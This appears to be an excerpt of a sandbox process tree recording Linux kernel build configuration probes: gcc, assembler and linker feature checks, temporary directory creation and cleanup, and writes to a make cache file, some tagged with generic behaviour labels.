/bin/rmrm -rf /tmp/a/.tmp_17904⤵PID:1796
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\".cfi_sections_.debug_frame\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_CFI_SECTIONS_1\";_else_echo_\"\";_fi := -DCONFIG_AS_CFI_SECTIONS=1' >> /tmp/a/.cache.mk"3⤵PID:1797
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"fxsaveq (%rax)\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_FXSAVEQ=1\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1798 -
/bin/mkdirmkdir -p /tmp/a/.tmp_17984⤵PID:1799
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1798/tmp -4⤵PID:1802
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp -5⤵PID:1803
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1798/tmp -5⤵PID:1803
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp -5⤵PID:1803
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1798/tmp -5⤵PID:1803
-
/bin/rmrm -rf /tmp/a/.tmp_17984⤵PID:1804
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"fxsaveq__%rax_\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_FXSAVEQ_1\";_else_echo_\"\";_fi := -DCONFIG_AS_FXSAVEQ=1' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1805 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"pshufb %xmm0,%xmm0\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SSSE3=1\"; else echo \"\"; fi"3⤵PID:1806
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18064⤵PID:1807
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1806/tmp -4⤵PID:1810
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1806/tmp -5⤵PID:1811
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1806/tmp -5⤵PID:1811
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1806/tmp -5⤵PID:1811
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1806/tmp -5⤵PID:1811
-
/bin/rmrm -rf /tmp/a/.tmp_18064⤵PID:1812
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"pshufb_%xmm0_%xmm0\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_SSSE3_1\";_else_echo_\"\";_fi := -DCONFIG_AS_SSSE3=1' >> /tmp/a/.cache.mk"3⤵PID:1813
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"crc32l %eax,%eax\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CRC32=1\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1814 -
/bin/mkdirmkdir -p /tmp/a/.tmp_18144⤵PID:1815
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1814/tmp -4⤵PID:1818
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1814/tmp -5⤵PID:1819
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1814/tmp -5⤵PID:1819
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1814/tmp -5⤵PID:1819
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1814/tmp -5⤵
- Writes file to tmp directory
PID:1819 -
/bin/rmrm -rf /tmp/a/.tmp_18144⤵PID:1820
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"crc32l_%eax_%eax\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_CRC32_1\";_else_echo_\"\";_fi := -DCONFIG_AS_CRC32=1' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:1821 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vxorps %ymm0,%ymm1,%ymm2\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX=1\"; else echo \"\"; fi"3⤵PID:1822
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18224⤵PID:1823
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1822/tmp -4⤵PID:1826
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1822/tmp -5⤵PID:1827
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1822/tmp -5⤵PID:1827
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1822/tmp -5⤵PID:1827
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1822/tmp -5⤵PID:1827
-
/bin/rmrm -rf /tmp/a/.tmp_18224⤵PID:1828
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"vxorps_%ymm0_%ymm1_%ymm2\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_AVX_1\";_else_echo_\"\";_fi := -DCONFIG_AS_AVX=1' >> /tmp/a/.cache.mk"3⤵PID:1829
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vpbroadcastb %xmm0,%ymm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX2=1\"; else echo \"\"; fi"3⤵PID:1830
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18304⤵PID:1831
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1830/tmp -4⤵PID:1834
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1830/tmp -5⤵PID:1835
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1830/tmp -5⤵PID:1835
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1830/tmp -5⤵PID:1835
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1830/tmp -5⤵PID:1835
-
/bin/rmrm -rf /tmp/a/.tmp_18304⤵PID:1836
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"vpbroadcastb_%xmm0_%ymm1\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_AVX2_1\";_else_echo_\"\";_fi := -DCONFIG_AS_AVX2=1' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1837 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vpmovm2b %k1,%zmm5\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX512=1\"; else echo \"\"; fi"3⤵PID:1838
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18384⤵PID:1839
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1838/tmp -4⤵PID:1842
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1838/tmp -5⤵PID:1843
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1838/tmp -5⤵PID:1843
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1838/tmp -5⤵PID:1843
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1838/tmp -5⤵
- Writes file to tmp directory
PID:1843 -
/bin/rmrm -rf /tmp/a/.tmp_18384⤵PID:1844
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"vpmovm2b_%k1_%zmm5\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_AVX512_1\";_else_echo_\"\";_fi := -DCONFIG_AS_AVX512=1' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1845 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"sha1msg1 %xmm0,%xmm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SHA1_NI=1\"; else echo \"\"; fi"3⤵PID:1846
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18464⤵
- Reads runtime system information
PID:1847 -
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1846/tmp -4⤵PID:1850
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1846/tmp -5⤵PID:1851
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1846/tmp -5⤵PID:1851
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1846/tmp -5⤵PID:1851
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1846/tmp -5⤵PID:1851
-
/bin/rmrm -rf /tmp/a/.tmp_18464⤵PID:1852
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"sha1msg1_%xmm0_%xmm1\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_SHA1_NI_1\";_else_echo_\"\";_fi := -DCONFIG_AS_SHA1_NI=1' >> /tmp/a/.cache.mk"3⤵PID:1853
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"sha256msg1 %xmm0,%xmm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SHA256_NI=1\"; else echo \"\"; fi"3⤵PID:1854
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18544⤵
- Reads runtime system information
PID:1855 -
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1854/tmp -4⤵PID:1858
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1854/tmp -5⤵PID:1859
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1854/tmp -5⤵PID:1859
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1854/tmp -5⤵PID:1859
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1854/tmp -5⤵PID:1859
-
/bin/rmrm -rf /tmp/a/.tmp_18544⤵PID:1860
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\"sha256msg1_%xmm0_%xmm1\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_SHA256_NI_1\";_else_echo_\"\";_fi := -DCONFIG_AS_SHA256_NI=1' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1861 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z max-page-size=0x200000 -v) >/dev/null 2>&1; then echo \" -z max-page-size=0x200000\"; else echo \"\"; fi"3⤵PID:1862
-
/bin/mkdirmkdir -p /tmp/a/.tmp_18624⤵PID:1863
-
/usr/bin/ldld -m elf_x86_64 -z "max-page-size=0x200000" -v4⤵PID:1864
-
/bin/rmrm -rf /tmp/a/.tmp_18624⤵PID:1865
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___ld_-m_elf_x86_64__-z_max-page-size_0x200000_-v__>/dev/null_2>&1;_then_echo_\"_-z_max-page-size_0x200000\";_else_echo_\"\";_fi := -z max-page-size=0x200000' >> /tmp/a/.cache.mk"3⤵PID:1866
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-jump-tables\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1867 -
/bin/mkdirmkdir -p /tmp/a/.tmp_18674⤵PID:1868
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -c -x c /dev/null -o /tmp/a/.tmp_1867/tmp4⤵PID:1869
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1867/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fstack-protector-strong -o -5⤵PID:1870
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1867/tmp5⤵PID:1871
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1867/tmp5⤵PID:1871
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1867/tmp5⤵PID:1871
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1867/tmp5⤵PID:1871
-
/bin/rmrm -rf /tmp/a/.tmp_18674⤵PID:1872
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-jump-tables\";_else_echo_\"\";_fi := -fno-jump-tables' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1873 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-delete-null-pointer-checks\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1874 -
/bin/mkdirmkdir -p /tmp/a/.tmp_18744⤵PID:1875
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -c -x c /dev/null -o /tmp/a/.tmp_1874/tmp4⤵PID:1876
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1874/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -o -5⤵PID:1877
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1874/tmp5⤵PID:1878
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1874/tmp5⤵PID:1878
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1874/tmp5⤵PID:1878
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1874/tmp5⤵PID:1878
-
/bin/rmrm -rf /tmp/a/.tmp_18744⤵PID:1879
-
